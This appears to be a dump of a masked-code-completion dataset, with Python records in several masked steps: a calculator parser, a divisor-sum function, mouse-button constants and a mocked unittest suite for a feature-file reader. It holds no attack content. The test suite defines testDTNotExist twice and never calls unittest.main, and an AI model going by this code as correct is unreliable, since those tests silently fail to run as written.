Element(right_token.token),\n Operator(operator.token)\n )\n )\n\ndef test_ast():\n calcul_visitor = Interpreter()\n op = Operation(Element(7), Element(3), Operator('+'))\n Operation(op, op, Operator('+')).accept(calcul_visitor)\n calcul_visitor.print_result()\n\ndef test_lexer():\n string = '1 + 3 + 4 + 50 + 1 + 0'\n lexer = Lexer(string)\n token = lexer.get_token()\n while (not token.empty):\n print(token.token)\n token = lexer.get_token()\n\ndef test_parser():\n parser = Parser(Lexer('1 + 2 + 3'))\n ast = parser.parse()\n ast.accept(PrettyPrint())\n print()\n\nwhile True:\n try:\n _in = input('string to calculate:')\n except EOFError:\n print()\n break\n ast = Parser(Lexer(_in)).parse()\n ast.accept(PrettyPrint())\n calc = Interpreter()\n ast.accept(calc)\n print(' = ', end='')\n calc.print_result()\n", "step-ids": [ 10, 11, 13, 15, 16 ] }
[ 10, 11, 13, 15, 16 ]
def solution(n): answer = [] for i in range(1,n+1): if n % i == 0: answer.append(i) return sum(answer) def solution2(n): return sum([i for i in range(1,n+1) if n % i == 0]) print(solution(12)) print(solution(5)) print(solution2(12)) print(solution2(5)) # n return # 12 28 # 5 6
normal
{ "blob_id": "7cfbc36cc6cd6ff7c30f02d979667448f2003546", "index": 9267, "step-1": "<mask token>\n", "step-2": "<mask token>\n\n\ndef solution2(n):\n return sum([i for i in range(1, n + 1) if n % i == 0])\n\n\n<mask token>\n", "step-3": "def solution(n):\n answer = []\n for i in range(1, n + 1):\n if n % i == 0:\n answer.append(i)\n return sum(answer)\n\n\ndef solution2(n):\n return sum([i for i in range(1, n + 1) if n % i == 0])\n\n\n<mask token>\n", "step-4": "def solution(n):\n answer = []\n for i in range(1, n + 1):\n if n % i == 0:\n answer.append(i)\n return sum(answer)\n\n\ndef solution2(n):\n return sum([i for i in range(1, n + 1) if n % i == 0])\n\n\nprint(solution(12))\nprint(solution(5))\nprint(solution2(12))\nprint(solution2(5))\n", "step-5": "def solution(n):\n answer = []\n for i in range(1,n+1):\n if n % i == 0:\n answer.append(i)\n\n return sum(answer)\n\ndef solution2(n):\n return sum([i for i in range(1,n+1) if n % i == 0])\n\nprint(solution(12))\nprint(solution(5))\nprint(solution2(12))\nprint(solution2(5))\n# n\treturn\n# 12\t28\n# 5\t6", "step-ids": [ 0, 1, 2, 3, 4 ] }
[ 0, 1, 2, 3, 4 ]
class ClickAction: Click = 0 DoubleClick = 1 class MouseButton: Left = 0 Right = 1 Middle = 2
normal
{ "blob_id": "cabebeb5ca02da2505df4a138e8b28f74dd108fa", "index": 4362, "step-1": "<mask token>\n\n\nclass MouseButton:\n <mask token>\n <mask token>\n <mask token>\n", "step-2": "<mask token>\n\n\nclass MouseButton:\n Left = 0\n Right = 1\n Middle = 2\n", "step-3": "class ClickAction:\n <mask token>\n <mask token>\n\n\nclass MouseButton:\n Left = 0\n Right = 1\n Middle = 2\n", "step-4": "class ClickAction:\n Click = 0\n DoubleClick = 1\n\n\nclass MouseButton:\n Left = 0\n Right = 1\n Middle = 2\n", "step-5": null, "step-ids": [ 1, 2, 3, 4 ] }
[ 1, 2, 3, 4 ]
import unittest from FileFeatureReader.featurereaders import RFEFeatureReader, DTFeatureReader from FileFeatureReader.featurereader import FeatureReader from unittest import mock from unittest.mock import patch import builtins class TestFeatureReader(unittest.TestCase): def setUp(self): self.rfe_feat_reader = FeatureReader(RFEFeatureReader(), "/foo/bar.txt") self.dt_feat_reader = FeatureReader(DTFeatureReader(), "/foo/bar.txt") def testRFEFull(self): feat = ['column1', 'column2', 'column3'] read_data = 'Header\n---- column1\n---- column2\n---- column3\n' mock_open = mock.mock_open(read_data=read_data) with mock.patch("builtins.open", mock_open), mock.patch("os.stat", return_value=mock.Mock()): readlist = self.rfe_feat_reader.getFeats() self.assertEqual(feat, readlist) def testRFEFull2(self): feat = ['column1', 'column2'] read_data = 'Header\n---- column1\n---- column2\n---- column3\n' mock_open = mock.mock_open(read_data=read_data) with mock.patch("builtins.open", mock_open), mock.patch("os.stat", return_value=mock.Mock()): readlist = self.rfe_feat_reader.getNFeats(2) self.assertEqual(feat, readlist) def testRFEFull3(self): feat = ['column1', 'column2'] read_data = 'Header\n---- column1\n---- column2\n---- column3\n' mock_open = mock.mock_open(read_data=read_data) with mock.patch("builtins.open", mock_open), mock.patch("os.stat", return_value=mock.Mock()): with self.assertRaises(ValueError) as context: readlist = self.rfe_feat_reader.getNFeats(0) self.assertEqual('n parameter is lower than 1 (it is 0)', str(context.exception)) def testRFEEmptyFile(self): mck = mock.Mock() attrs = {'st_size': 0} mck.configure_mock(**attrs) read_data = '' mock_open = mock.mock_open(read_data=read_data) with mock.patch("builtins.open", mock_open), mock.patch("os.stat", return_value=mck): with self.assertRaises(ValueError) as context: readlist = self.rfe_feat_reader.getFeats() self.assertEqual('/foo/bar.txt is empty', str(context.exception)) def testRFEEmptyFile2(self): mck = mock.Mock() attrs = {'st_size': 0} mck.configure_mock(**attrs) read_data = '' mock_open = mock.mock_open(read_data=read_data) with mock.patch("builtins.open", mock_open), mock.patch("os.stat", return_value=mck): with self.assertRaises(ValueError) as context: readlist = self.rfe_feat_reader.getNFeats(2) self.assertEqual('/foo/bar.txt is empty', str(context.exception)) def testDTFull(self): feat = ['column1', 'column2', 'column3'] read_data = 'Header\n---- column1: 0.1738919473844908\n---- column2: 0.1738919473844908\n---- column3: 0.1738919473844908\n' mock_open = mock.mock_open(read_data=read_data) with mock.patch("builtins.open", mock_open), mock.patch("os.stat", return_value=mock.Mock()): readlist = self.dt_feat_reader.getFeats() self.assertEqual(feat, readlist) def testDTFull2(self): feat = ['column1', 'column2'] read_data = 'Header\n---- column1: 0.1738919473844908\n---- column2: 0.1738919473844908\n---- column3: 0.1738919473844908\n' mock_open = mock.mock_open(read_data=read_data) with mock.patch("builtins.open", mock_open), mock.patch("os.stat", return_value=mock.Mock()): readlist = self.dt_feat_reader.getNFeats(2) self.assertEqual(feat, readlist) def testDTFull3(self): feat = ['column1', 'column2'] read_data = 'Header\n---- column1: 0.1738919473844908\n---- column2: 0.1738919473844908\n---- column3: 0.1738919473844908\n' mock_open = mock.mock_open(read_data=read_data) with mock.patch("builtins.open", mock_open), mock.patch("os.stat", return_value=mock.Mock()): with self.assertRaises(ValueError) as context: readlist = self.rfe_feat_reader.getNFeats(0) self.assertEqual('n parameter is lower than 1 (it is 0)', str(context.exception)) def testDTEmpty(self): mck = mock.Mock() attrs = {'st_size': 0} mck.configure_mock(**attrs) read_data = '' mock_open = mock.mock_open(read_data=read_data) with mock.patch("builtins.open", mock_open), mock.patch("os.stat", return_value=mck): with self.assertRaises(ValueError) as context: readlist = self.dt_feat_reader.getFeats() self.assertEqual('/foo/bar.txt is empty', str(context.exception)) def testDTEmpty2(self): mck = mock.Mock() attrs = {'st_size': 0} mck.configure_mock(**attrs) read_data = '' mock_open = mock.mock_open(read_data=read_data) with mock.patch("builtins.open", mock_open), mock.patch("os.stat", return_value=mck): with self.assertRaises(ValueError) as context: readlist = self.dt_feat_reader.getNFeats(2) self.assertEqual('/foo/bar.txt is empty', str(context.exception)) def testRFENotExist(self): with self.assertRaises(IOError) as context: readlist = self.rfe_feat_reader.getFeats() self.assertEqual('/foo/bar.txt does not exist', str(context.exception)) def testRFENotExist2(self): with self.assertRaises(IOError) as context: readlist = self.rfe_feat_reader.getNFeats(3) self.assertEqual('/foo/bar.txt does not exist', str(context.exception)) def testDTNotExist(self): with self.assertRaises(IOError) as context: readlist = self.dt_feat_reader.getFeats() self.assertEqual('/foo/bar.txt does not exist', str(context.exception)) def testDTNotExist(self): with self.assertRaises(IOError) as context: readlist = self.dt_feat_reader.getNFeats(3) self.assertEqual('/foo/bar.txt does not exist', str(context.exception)) if __name__ == '__main__': unittest.main
normal
{ "blob_id": "5436e9270e61f5f9ab41fc1f35a80f4b8def65ee", "index": 2048, "step-1": "<mask token>\n\n\nclass TestFeatureReader(unittest.TestCase):\n <mask token>\n\n def testRFEFull(self):\n feat = ['column1', 'column2', 'column3']\n read_data = 'Header\\n---- column1\\n---- column2\\n---- column3\\n'\n mock_open = mock.mock_open(read_data=read_data)\n with mock.patch('builtins.open', mock_open), mock.patch('os.stat',\n return_value=mock.Mock()):\n readlist = self.rfe_feat_reader.getFeats()\n self.assertEqual(feat, readlist)\n <mask token>\n\n def testRFEFull3(self):\n feat = ['column1', 'column2']\n read_data = 'Header\\n---- column1\\n---- column2\\n---- column3\\n'\n mock_open = mock.mock_open(read_data=read_data)\n with mock.patch('builtins.open', mock_open), mock.patch('os.stat',\n return_value=mock.Mock()):\n with self.assertRaises(ValueError) as context:\n readlist = self.rfe_feat_reader.getNFeats(0)\n self.assertEqual('n parameter is lower than 1 (it is 0)', str(\n context.exception))\n\n def testRFEEmptyFile(self):\n mck = mock.Mock()\n attrs = {'st_size': 0}\n mck.configure_mock(**attrs)\n read_data = ''\n mock_open = mock.mock_open(read_data=read_data)\n with mock.patch('builtins.open', mock_open), mock.patch('os.stat',\n return_value=mck):\n with self.assertRaises(ValueError) as context:\n readlist = self.rfe_feat_reader.getFeats()\n self.assertEqual('/foo/bar.txt is empty', str(context.exception))\n\n def testRFEEmptyFile2(self):\n mck = mock.Mock()\n attrs = {'st_size': 0}\n mck.configure_mock(**attrs)\n read_data = ''\n mock_open = mock.mock_open(read_data=read_data)\n with mock.patch('builtins.open', mock_open), mock.patch('os.stat',\n return_value=mck):\n with self.assertRaises(ValueError) as context:\n readlist = self.rfe_feat_reader.getNFeats(2)\n self.assertEqual('/foo/bar.txt is empty', str(context.exception))\n\n def testDTFull(self):\n feat = ['column1', 'column2', 'column3']\n read_data = \"\"\"Header\n---- column1: 0.1738919473844908\n---- column2: 0.1738919473844908\n---- column3: 0.1738919473844908\n\"\"\"\n mock_open = mock.mock_open(read_data=read_data)\n with mock.patch('builtins.open', mock_open), mock.patch('os.stat',\n return_value=mock.Mock()):\n readlist = self.dt_feat_reader.getFeats()\n self.assertEqual(feat, readlist)\n\n def testDTFull2(self):\n feat = ['column1', 'column2']\n read_data = \"\"\"Header\n---- column1: 0.1738919473844908\n---- column2: 0.1738919473844908\n---- column3: 0.1738919473844908\n\"\"\"\n mock_open = mock.mock_open(read_data=read_data)\n with mock.patch('builtins.open', mock_open), mock.patch('os.stat',\n return_value=mock.Mock()):\n readlist = self.dt_feat_reader.getNFeats(2)\n self.assertEqual(feat, readlist)\n\n def testDTFull3(self):\n feat = ['column1', 'column2']\n read_data = \"\"\"Header\n---- column1: 0.1738919473844908\n---- column2: 0.1738919473844908\n---- column3: 0.1738919473844908\n\"\"\"\n mock_open = mock.mock_open(read_data=read_data)\n with mock.patch('builtins.open', mock_open), mock.patch('os.stat',\n return_value=mock.Mock()):\n with self.assertRaises(ValueError) as context:\n readlist = self.rfe_feat_reader.getNFeats(0)\n self.assertEqual('n parameter is lower than 1 (it is 0)', str(\n context.exception))\n\n def testDTEmpty(self):\n mck = mock.Mock()\n attrs = {'st_size': 0}\n mck.configure_mock(**attrs)\n read_data = ''\n mock_open = mock.mock_open(read_data=read_data)\n with mock.patch('builtins.open', mock_open), mock.patch('os.stat',\n return_value=mck):\n with self.assertRaises(ValueError) as context:\n readlist = self.dt_feat_reader.getFeats()\n self.assertEqual('/foo/bar.txt is empty', str(context.exception))\n\n def testDTEmpty2(self):\n mck = mock.Mock()\n attrs = {'st_size': 0}\n mck.configure_mock(**attrs)\n read_data = ''\n mock_open = mock.mock_open(read_data=read_data)\n with mock.patch('builtins.open', mock_open), mock.patch('os.stat',\n return_value=mck):\n with self.assertRaises(ValueError) as context:\n readlist = self.dt_feat_reader.getNFeats(2)\n self.assertEqual('/foo/bar.txt is empty', str(context.exception))\n\n def testRFENotExist(self):\n with self.assertRaises(IOError) as context:\n readlist = self.rfe_feat_reader.getFeats()\n self.assertEqual('/foo/bar.txt does not exist', str(context.exception))\n\n def testRFENotExist2(self):\n with self.assertRaises(IOError) as context:\n readlist = self.rfe_feat_reader.getNFeats(3)\n self.assertEqual('/foo/bar.txt does not exist', str(context.exception))\n\n def testDTNotExist(self):\n with self.assertRaises(IOError) as context:\n readlist = self.dt_feat_reader.getFeats()\n self.assertEqual('/foo/bar.txt does not exist', str(context.exception))\n\n def testDTNotExist(self):\n with self.assertRaises(IOError) as context:\n readlist = self.dt_feat_reader.getNFeats(3)\n self.assertEqual('/foo/bar.txt does not exist', str(context.exception))\n\n\n<mask token>\n", "step-2": "<mask token>\n\n\nclass TestFeatureReader(unittest.TestCase):\n\n def setUp(self):\n self.rfe_feat_reader = FeatureReader(RFEFeatureReader(), '/foo/bar.txt'\n )\n self.dt_feat_reader = FeatureReader(DTFeatureReader(), '/foo/bar.txt')\n\n def testRFEFull(self):\n feat = ['column1', 'column2', 'column3']\n read_data = 'Header\\n---- column1\\n---- column2\\n---- column3\\n'\n mock_open = mock.mock_open(read_data=read_data)\n with mock.patch('builtins.open', mock_open), mock.patch('os.stat',\n return_value=mock.Mock()):\n readlist = self.rfe_feat_reader.getFeats()\n self.assertEqual(feat, readlist)\n\n def testRFEFull2(self):\n feat = ['column1', 'column2']\n read_data = 'Header\\n---- column1\\n---- column2\\n---- column3\\n'\n mock_open = mock.mock_open(read_data=read_data)\n with mock.patch('builtins.open', mock_open), mock.patch('os.stat',\n return_value=mock.Mock()):\n readlist = self.rfe_feat_reader.getNFeats(2)\n self.assertEqual(feat, readlist)\n\n def testRFEFull3(self):\n feat = ['column1', 'column2']\n read_data = 'Header\\n---- column1\\n---- column2\\n---- column3\\n'\n mock_open = mock.mock_open(read_data=read_data)\n with mock.patch('builtins.open', mock_open), mock.patch('os.stat',\n return_value=mock.Mock()):\n with self.assertRaises(ValueError) as context:\n readlist = self.rfe_feat_reader.getNFeats(0)\n self.assertEqual('n parameter is lower than 1 (it is 0)', str(\n context.exception))\n\n def testRFEEmptyFile(self):\n mck = mock.Mock()\n attrs = {'st_size': 0}\n mck.configure_mock(**attrs)\n read_data = ''\n mock_open = mock.mock_open(read_data=read_data)\n with mock.patch('builtins.open', mock_open), mock.patch('os.stat',\n return_value=mck):\n with self.assertRaises(ValueError) as context:\n readlist = self.rfe_feat_reader.getFeats()\n self.assertEqual('/foo/bar.txt is empty', str(context.exception))\n\n def testRFEEmptyFile2(self):\n mck = mock.Mock()\n attrs = {'st_size': 0}\n mck.configure_mock(**attrs)\n read_data = ''\n mock_open = mock.mock_open(read_data=read_data)\n with mock.patch('builtins.open', mock_open), mock.patch('os.stat',\n return_value=mck):\n with self.assertRaises(ValueError) as context:\n readlist = self.rfe_feat_reader.getNFeats(2)\n self.assertEqual('/foo/bar.txt is empty', str(context.exception))\n\n def testDTFull(self):\n feat = ['column1', 'column2', 'column3']\n read_data = \"\"\"Header\n---- column1: 0.1738919473844908\n---- column2: 0.1738919473844908\n---- column3: 0.1738919473844908\n\"\"\"\n mock_open = mock.mock_open(read_data=read_data)\n with mock.patch('builtins.open', mock_open), mock.patch('os.stat',\n return_value=mock.Mock()):\n readlist = self.dt_feat_reader.getFeats()\n self.assertEqual(feat, readlist)\n\n def testDTFull2(self):\n feat = ['column1', 'column2']\n read_data = \"\"\"Header\n---- column1: 0.1738919473844908\n---- column2: 0.1738919473844908\n---- column3: 0.1738919473844908\n\"\"\"\n mock_open = mock.mock_open(read_data=read_data)\n with mock.patch('builtins.open', mock_open), mock.patch('os.stat',\n return_value=mock.Mock()):\n readlist = self.dt_feat_reader.getNFeats(2)\n self.assertEqual(feat, readlist)\n\n def testDTFull3(self):\n feat = ['column1', 'column2']\n read_data = \"\"\"Header\n---- column1: 0.1738919473844908\n---- column2: 0.1738919473844908\n---- column3: 0.1738919473844908\n\"\"\"\n mock_open = mock.mock_open(read_data=read_data)\n with mock.patch('builtins.open', mock_open), mock.patch('os.stat',\n return_value=mock.Mock()):\n with self.assertRaises(ValueError) as context:\n readlist = self.rfe_feat_reader.getNFeats(0)\n self.assertEqual('n parameter is lower than 1 (it is 0)', str(\n context.exception))\n\n def testDTEmpty(self):\n mck = mock.Mock()\n attrs = {'st_size': 0}\n mck.configure_mock(**attrs)\n read_data = ''\n mock_open = mock.mock_open(read_data=read_data)\n with mock.patch('builtins.open', mock_open), mock.patch('os.stat',\n return_value=mck):\n with self.assertRaises(ValueError) as context:\n readlist = self.dt_feat_reader.getFeats()\n self.assertEqual('/foo/bar.txt is empty', str(context.exception))\n\n def testDTEmpty2(self):\n mck = mock.Mock()\n attrs = {'st_size': 0}\n mck.configure_mock(**attrs)\n read_data = ''\n mock_open = mock.mock_open(read_data=read_data)\n with mock.patch('builtins.open', mock_open), mock.patch('os.stat',\n return_value=mck):\n with self.assertRaises(ValueError) as context:\n readlist = self.dt_feat_reader.getNFeats(2)\n self.assertEqual('/foo/bar.txt is empty', str(context.exception))\n\n def testRFENotExist(self):\n with self.assertRaises(IOError) as context:\n readlist = self.rfe_feat_reader.getFeats()\n self.assertEqual('/foo/bar.txt does not exist', str(context.exception))\n\n def testRFENotExist2(self):\n with self.assertRaises(IOError) as context:\n readlist = self.rfe_feat_reader.getNFeats(3)\n self.assertEqual('/foo/bar.txt does not exist', str(context.exception))\n\n def testDTNotExist(self):\n with self.assertRaises(IOError) as context:\n readlist = self.dt_feat_reader.getFeats()\n self.assertEqual('/foo/bar.txt does not exist', str(context.exception))\n\n def testDTNotExist(self):\n with self.assertRaises(IOError) as context:\n readlist = self.dt_feat_reader.getNFeats(3)\n self.assertEqual('/foo/bar.txt does not exist', str(context.exception))\n\n\n<mask token>\n", "step-3": "<mask token>\n\n\nclass TestFeatureReader(unittest.TestCase):\n\n def setUp(self):\n self.rfe_feat_reader = FeatureReader(RFEFeatureReader(), '/foo/bar.txt'\n )\n self.dt_feat_reader = FeatureReader(DTFeatureReader(), '/foo/bar.txt')\n\n def testRFEFull(self):\n feat = ['column1', 'column2', 'column3']\n read_data = 'Header\\n---- column1\\n---- column2\\n---- column3\\n'\n mock_open = mock.mock_open(read_data=read_data)\n with mock.patch('builtins.open', mock_open), mock.patch('os.stat',\n return_value=mock.Mock()):\n readlist = self.rfe_feat_reader.getFeats()\n self.assertEqual(feat, readlist)\n\n def testRFEFull2(self):\n feat = ['column1', 'column2']\n read_data = 'Header\\n---- column1\\n---- column2\\n---- column3\\n'\n mock_open = mock.mock_open(read_data=read_data)\n with mock.patch('builtins.open', mock_open), mock.patch('os.stat',\n return_value=mock.Mock()):\n readlist = self.rfe_feat_reader.getNFeats(2)\n self.assertEqual(feat, readlist)\n\n def testRFEFull3(self):\n feat = ['column1', 'column2']\n read_data = 'Header\\n---- column1\\n---- column2\\n---- column3\\n'\n mock_open = mock.mock_open(read_data=read_data)\n with mock.patch('builtins.open', mock_open), mock.patch('os.stat',\n return_value=mock.Mock()):\n with self.assertRaises(ValueError) as context:\n readlist = self.rfe_feat_reader.getNFeats(0)\n self.assertEqual('n parameter is lower than 1 (it is 0)', str(\n context.exception))\n\n def testRFEEmptyFile(self):\n mck = mock.Mock()\n attrs = {'st_size': 0}\n mck.configure_mock(**attrs)\n read_data = ''\n mock_open = mock.mock_open(read_data=read_data)\n with mock.patch('builtins.open', mock_open), mock.patch('os.stat',\n return_value=mck):\n with self.assertRaises(ValueError) as context:\n readlist = self.rfe_feat_reader.getFeats()\n self.assertEqual('/foo/bar.txt is empty', str(context.exception))\n\n def testRFEEmptyFile2(self):\n mck = mock.Mock()\n attrs = {'st_size': 0}\n mck.configure_mock(**attrs)\n read_data = ''\n mock_open = mock.mock_open(read_data=read_data)\n with mock.patch('builtins.open', mock_open), mock.patch('os.stat',\n return_value=mck):\n with self.assertRaises(ValueError) as context:\n readlist = self.rfe_feat_reader.getNFeats(2)\n self.assertEqual('/foo/bar.txt is empty', str(context.exception))\n\n def testDTFull(self):\n feat = ['column1', 'column2', 'column3']\n read_data = \"\"\"Header\n---- column1: 0.1738919473844908\n---- column2: 0.1738919473844908\n---- column3: 0.1738919473844908\n\"\"\"\n mock_open = mock.mock_open(read_data=read_data)\n with mock.patch('builtins.open', mock_open), mock.patch('os.stat',\n return_value=mock.Mock()):\n readlist = self.dt_feat_reader.getFeats()\n self.assertEqual(feat, readlist)\n\n def testDTFull2(self):\n feat = ['column1', 'column2']\n read_data = \"\"\"Header\n---- column1: 0.1738919473844908\n---- column2: 0.1738919473844908\n---- column3: 0.1738919473844908\n\"\"\"\n mock_open = mock.mock_open(read_data=read_data)\n with mock.patch('builtins.open', mock_open), mock.patch('os.stat',\n return_value=mock.Mock()):\n readlist = self.dt_feat_reader.getNFeats(2)\n self.assertEqual(feat, readlist)\n\n def testDTFull3(self):\n feat = ['column1', 'column2']\n read_data = \"\"\"Header\n---- column1: 0.1738919473844908\n---- column2: 0.1738919473844908\n---- column3: 0.1738919473844908\n\"\"\"\n mock_open = mock.mock_open(read_data=read_data)\n with mock.patch('builtins.open', mock_open), mock.patch('os.stat',\n return_value=mock.Mock()):\n with self.assertRaises(ValueError) as context:\n readlist = self.rfe_feat_reader.getNFeats(0)\n self.assertEqual('n parameter is lower than 1 (it is 0)', str(\n context.exception))\n\n def testDTEmpty(self):\n mck = mock.Mock()\n attrs = {'st_size': 0}\n mck.configure_mock(**attrs)\n read_data = ''\n mock_open = mock.mock_open(read_data=read_data)\n with mock.patch('builtins.open', mock_open), mock.patch('os.stat',\n return_value=mck):\n with self.assertRaises(ValueError) as context:\n readlist = self.dt_feat_reader.getFeats()\n self.assertEqual('/foo/bar.txt is empty', str(context.exception))\n\n def testDTEmpty2(self):\n mck = mock.Mock()\n attrs = {'st_size': 0}\n mck.configure_mock(**attrs)\n read_data = ''\n mock_open = mock.mock_open(read_data=read_data)\n with mock.patch('builtins.open', mock_open), mock.patch('os.stat',\n return_value=mck):\n with self.assertRaises(ValueError) as context:\n readlist = self.dt_feat_reader.getNFeats(2)\n self.assertEqual('/foo/bar.txt is empty', str(context.exception))\n\n def testRFENotExist(self):\n with self.assertRaises(IOError) as context:\n readlist = self.rfe_feat_reader.getFeats()\n self.assertEqual('/foo/bar.txt does not exist', str(context.exception))\n\n def testRFENotExist2(self):\n with self.assertRaises(IOError) as context:\n readlist = self.rfe_feat_reader.getNFeats(3)\n self.assertEqual('/foo/bar.txt does not exist', str(context.exception))\n\n def testDTNotExist(self):\n with self.assertRaises(IOError) as context:\n readlist = self.dt_feat_reader.getFeats()\n self.assertEqual('/foo/bar.txt does not exist', str(context.exception))\n\n def testDTNotExist(self):\n with self.assertRaises(IOError) as context:\n readlist = self.dt_feat_reader.getNFeats(3)\n self.assertEqual('/foo/bar.txt does not exist', str(context.exception))\n\n\nif __name__ == '__main__':\n unittest.main\n", "step-4": "import unittest\nfrom FileFeatureReader.featurereaders import RFEFeatureReader, DTFeatureReader\nfrom FileFeatureReader.featurereader import FeatureReader\nfrom unittest import mock\nfrom unittest.mock import patch\nimport builtins\n\n\nclass TestFeatureReader(unittest.TestCase):\n\n def setUp(self):\n self.rfe_feat_reader = FeatureReader(RFEFeatureReader(), '/foo/bar.txt'\n )\n self.dt_feat_reader = FeatureReader(DTFeatureReader(), '/foo/bar.txt')\n\n def testRFEFull(self):\n feat = ['column1', 'column2', 'column3']\n read_data = 'Header\\n---- column1\\n---- column2\\n---- column3\\n'\n mock_open = mock.mock_open(read_data=read_data)\n with mock.patch('builtins.open', mock_open), mock.patch('os.stat',\n return_value=mock.Mock()):\n readlist = self.rfe_feat_reader.getFeats()\n self.assertEqual(feat, readlist)\n\n def testRFEFull2(self):\n feat = ['column1', 'column2']\n read_data = 'Header\\n---- column1\\n---- column2\\n---- column3\\n'\n mock_open = mock.mock_open(read_data=read_data)\n with mock.patch('builtins.open', mock_open), mock.patch('os.stat',\n return_value=mock.Mock()):\n readlist = self.rfe_feat_reader.getNFeats(2)\n self.assertEqual(feat, readlist)\n\n def testRFEFull3(self):\n feat = ['column1', 'column2']\n read_data = 'Header\\n---- column1\\n---- column2\\n---- column3\\n'\n mock_open = mock.mock_open(read_data=read_data)\n with mock.patch('builtins.open', mock_open), mock.patch('os.stat',\n return_value=mock.Mock()):\n with self.assertRaises(ValueError) as context:\n readlist = self.rfe_feat_reader.getNFeats(0)\n self.assertEqual('n parameter is lower than 1 (it is 0)', str(\n context.exception))\n\n def testRFEEmptyFile(self):\n mck = mock.Mock()\n attrs = {'st_size': 0}\n mck.configure_mock(**attrs)\n read_data = ''\n mock_open = mock.mock_open(read_data=read_data)\n with mock.patch('builtins.open', mock_open), mock.patch('os.stat',\n return_value=mck):\n with self.assertRaises(ValueError) as context:\n readlist = self.rfe_feat_reader.getFeats()\n self.assertEqual('/foo/bar.txt is empty', str(context.exception))\n\n def testRFEEmptyFile2(self):\n mck = mock.Mock()\n attrs = {'st_size': 0}\n mck.configure_mock(**attrs)\n read_data = ''\n mock_open = mock.mock_open(read_data=read_data)\n with mock.patch('builtins.open', mock_open), mock.patch('os.stat',\n return_value=mck):\n with self.assertRaises(ValueError) as context:\n readlist = self.rfe_feat_reader.getNFeats(2)\n self.assertEqual('/foo/bar.txt is empty', str(context.exception))\n\n def testDTFull(self):\n feat = ['column1', 'column2', 'column3']\n read_data = \"\"\"Header\n---- column1: 0.1738919473844908\n---- column2: 0.1738919473844908\n---- column3: 0.1738919473844908\n\"\"\"\n mock_open = mock.mock_open(read_data=read_data)\n with mock.patch('builtins.open', mock_open), mock.patch('os.stat',\n return_value=mock.Mock()):\n readlist = self.dt_feat_reader.getFeats()\n self.assertEqual(feat, readlist)\n\n def testDTFull2(self):\n feat = ['column1', 'column2']\n read_data = \"\"\"Header\n---- column1: 0.1738919473844908\n---- column2: 0.1738919473844908\n---- column3: 0.1738919473844908\n\"\"\"\n mock_open = mock.mock_open(read_data=read_data)\n with mock.patch('builtins.open', mock_open), mock.patch('os.stat',\n return_value=mock.Mock()):\n readlist = self.dt_feat_reader.getNFeats(2)\n self.assertEqual(feat, readlist)\n\n def testDTFull3(self):\n feat = ['column1', 'column2']\n read_data = \"\"\"Header\n---- column1: 0.1738919473844908\n---- column2: 0.1738919473844908\n---- column3: 0.1738919473844908\n\"\"\"\n mock_open = mock.mock_open(read_data=read_data)\n with mock.patch('builtins.open', mock_open), mock.patch('os.stat',\n return_value=mock.Mock()):\n with self.assertRaises(ValueError) as context:\n readlist = self.rfe_feat_reader.getNFeats(0)\n self.assertEqual('n parameter is lower than 1 (it is 0)', str(\n context.exception))\n\n def testDTEmpty(self):\n mck = mock.Mock()\n attrs = {'st_size': 0}\n mck.configure_mock(**attrs)\n read_data = ''\n mock_open = mock.mock_open(read_data=read_data)\n with mock.patch('builtins.open', mock_open), mock.patch('os.stat',\n return_value=mck):\n with self.assertRaises(ValueError) as context:\n readlist = self.dt_feat_reader.getFeats()\n self.assertEqual('/foo/bar.txt is empty', str(context.exception))\n\n def testDTEmpty2(self):\n mck = mock.Mock()\n attrs = {'st_size': 0}\n mck.configure_mock(**attrs)\n read_data = ''\n mock_open = mock.mock_open(read_data=read_data)\n with mock.patch('builtins.open', mock_open), mock.patch('os.stat',\n return_value=mck):\n with self.assertRaises(ValueError) as context:\n readlist = self.dt_feat_reader.getNFeats(2)\n self.assertEqual('/foo/bar.txt is empty', str(context.exception))\n\n def testRFENotExist(self):\n with self.assertRaises(IOError) as context:\n readlist = self.rfe_feat_reader.getFeats()\n self.assertEqual('/foo/bar.txt does not exist', str(context.exception))\n\n def testRFENotExist2(self):\n with self.assertRaises(IOError) as context:\n readlist = self.rfe_feat_reader.getNFeats(3)\n self.assertEqual('/foo/bar.txt does not exist', str(context.exception))\n\n def testDTNotExist(self):\n with self.assertRaises(IOError) as context:\n readlist = self.dt_feat_reader.getFeats()\n self.assertEqual('/foo/bar.txt does not exist', str(context.exception))\n\n def testDTNotExist(self):\n with self.assertRaises(IOError) as context:\n readlist = self.dt_feat_reader.getNFeats(3)\n self.assertEqual('/foo/bar.txt does not exist', str(context.exception))\n\n\nif __name__ == '__main__':\n unittest.main\n", "step-5": "import unittest\nfrom FileFeatureReader.featurereaders import RFEFeatureReader, DTFeatureReader\nfrom FileFeatureReader.featurereader import FeatureReader\nfrom unittest import mock\nfrom unittest.mock import patch\nimport builtins\n\nclass TestFeatureReader(unittest.TestCase):\n def setUp(self):\n self.rfe_feat_reader = FeatureReader(RFEFeatureReader(), \"/foo/bar.txt\")\n self.dt_feat_reader = FeatureReader(DTFeatureReader(), \"/foo/bar.txt\")\n\n def testRFEFull(self):\n feat = ['column1', 'column2', 'column3']\n read_data = 'Header\\n---- column1\\n---- column2\\n---- column3\\n'\n mock_open = mock.mock_open(read_data=read_data)\n with mock.patch(\"builtins.open\", mock_open), mock.patch(\"os.stat\", return_value=mock.Mock()):\n readlist = self.rfe_feat_reader.getFeats()\n self.assertEqual(feat, readlist)\n\n def testRFEFull2(self):\n feat = ['column1', 'column2']\n read_data = 'Header\\n---- column1\\n---- column2\\n---- column3\\n'\n mock_open = mock.mock_open(read_data=read_data)\n with mock.patch(\"builtins.open\", mock_open), mock.patch(\"os.stat\", return_value=mock.Mock()):\n readlist = self.rfe_feat_reader.getNFeats(2)\n self.assertEqual(feat, readlist)\n\n def testRFEFull3(self):\n feat = ['column1', 'column2']\n read_data = 'Header\\n---- column1\\n---- column2\\n---- column3\\n'\n mock_open = mock.mock_open(read_data=read_data)\n with mock.patch(\"builtins.open\", mock_open), mock.patch(\"os.stat\", return_value=mock.Mock()):\n with self.assertRaises(ValueError) as context:\n readlist = self.rfe_feat_reader.getNFeats(0)\n self.assertEqual('n parameter is lower than 1 (it is 0)', str(context.exception))\n\n def testRFEEmptyFile(self):\n mck = mock.Mock()\n attrs = {'st_size': 0}\n mck.configure_mock(**attrs)\n read_data = ''\n mock_open = mock.mock_open(read_data=read_data)\n with mock.patch(\"builtins.open\", mock_open), mock.patch(\"os.stat\", return_value=mck):\n with self.assertRaises(ValueError) as context:\n readlist = 